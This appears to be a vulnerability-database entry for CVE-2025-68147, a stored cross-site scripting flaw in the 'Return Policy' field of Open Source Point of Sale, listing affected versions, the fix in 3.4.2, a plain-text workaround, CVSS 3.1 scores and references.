Stored Cross-Site Scripting Vulnerability in Open Source Point of Sale by OpenSourcePOS
CVE-2025-68147

8.1HIGH

Key Information:

Vendor

Opensourcepos

Status
Opensourcepos
Vendor
CVE Published:
17 December 2025

What is CVE-2025-68147?

The Open Source Point of Sale application is susceptible to a stored cross-site scripting vulnerability in the 'Return Policy' configuration field. This issue arises from improper sanitization of user inputs, allowing attackers with access to this field to inject malicious JavaScript. When users, including other administrators and sales staff, view receipts or complete transactions, the injected scripts are executed in their browsers. This potentially leads to critical risks such as session hijacking and unauthorized actions. The vulnerability has been remediated in version 3.4.2 by implementing output escaping. In the meantime, administrators are advised to restrict the 'Return Policy' field to plain text only, avoiding any HTML tags, as no code-based workarounds exist.

Affected Version(s)

opensourcepos >= 3.4.0, < 3.4.2

References

https://github.com/opensourcepos/opensourcepos/security/a...
x_refsource_CONFIRM
https://github.com/opensourcepos/opensourcepos/commit/22297a
x_refsource_MISC
https://github.com/Nixon-H/CVE-2025-68147-OSPOS-Stored-XSS
x_refsource_MISC

CVSS V3.1

Score:
8.1
Severity:
HIGH
Confidentiality:
High
Integrity:
High
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Privileges Required:
High
User Interaction:
Required
Scope:
Changed

Timeline

  • Vulnerability published

  • Vulnerability Reserved

JSON
.
CVE-2025-68147 : Stored Cross-Site Scripting Vulnerability in Open Source Point of Sale by OpenSourcePOS